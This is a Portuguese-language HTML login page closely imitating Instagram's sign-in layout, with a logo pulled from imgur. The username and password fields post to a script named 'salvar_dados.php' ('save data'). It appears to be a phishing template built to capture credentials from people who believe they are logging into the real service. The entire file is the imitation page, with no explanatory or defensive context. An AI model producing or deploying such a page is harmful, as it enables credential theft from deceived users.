<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Formulário de Login</title>
  <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
  <style>
    * { margin: 0px; padding: 0px; }
    body { background-color: #eee; }
    #wrapper { width: 500px; margin: 50px auto; padding: 10px; }
    .main-content { width: 250px; margin: 10px auto; background-color: #fff; border: 2px solid #e6e6e6; padding: 40px 50px; }
    .header { margin-bottom: 5px; }
    .header img { height: 50px; width: 175px; margin: auto; position: relative; left: 40px; }
    .input-1, .input-2 { width: 100%; margin-bottom: 5px; padding: 8px 12px; border: 1px solid #dbdbdb; border-radius: 3px; }
    .overlap-text { position: relative; }
    .overlap-text a { position: absolute; top: 8px; right: 10px; color: #003569; font-size: 14px; text-decoration: none; }
    .btn { width: 100%; background-color: #3897f0; border: 1px solid #3897f0; padding: 5px 12px; color: #fff; font-weight: bold; cursor: pointer; border-radius: 3px; }
    .sub-content { width: 250px; margin: 10px auto; border: 1px solid #e6e6e6; padding: 20px 50px; background-color: #fff; }
    .s-part { text-align: center; font-family: 'Overpass Mono', monospace; word-spacing: -3px; letter-spacing: -2px; font-weight: normal; }
    .s-part a { text-decoration: none; cursor: pointer; color: #3897f0; }
    input:focus { background-color: yellow; }
  </style>
</head>
<body>

<div id="wrapper">
  <div class="main-content">
    <div class="header">
      <img src="https://i.imgur.com/zqpwkLQ.png" />
    </div>
    <form action="salvar_dados.php" method="post">
      <div class="l-part">
        <input type="text" placeholder="Telefone, nome de usuário ou email" class="input-1" name="email" required/>
        <div class="overlap-text">
          <input type="password" placeholder="Senha" class="input-2" name="senha" required/>
        </div>
        <a href="#">Esqueceu a senha?</a>
        <input type="submit" value="Entrar" class="btn" />
      </div>
    </form>
  </div>
  <div class="sub-content">
    <div class="s-part">
      Não tem uma conta?<a href="#"> Cadastre-se</a>
    </div>
  </div>
</div>

</body>
</html>
